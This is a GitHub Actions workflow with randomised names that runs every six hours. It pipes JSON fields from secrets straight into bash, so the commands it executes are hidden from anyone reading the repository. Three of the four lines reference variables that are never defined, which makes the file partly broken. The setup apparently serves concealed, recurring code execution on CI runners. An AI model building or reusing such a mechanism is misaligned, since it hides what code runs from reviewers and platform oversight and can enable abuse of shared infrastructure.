name: zhuzhuanyun3987

on:
  workflow_dispatch:
  schedule:
    - cron: '30 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhuzhuanyun3987
        env:
          qc86: ${{ secrets.qc86 }}
        run: |
          echo $qc86 | jq -r .bxrf2 | /bin/bash
          echo $p216 | jq -r .q58 | /bin/bash
          echo $sn57174 | jq -r .mt40 | /bin/bash
          echo $uklnv3617 | jq -r .xglcm544 | /bin/bash

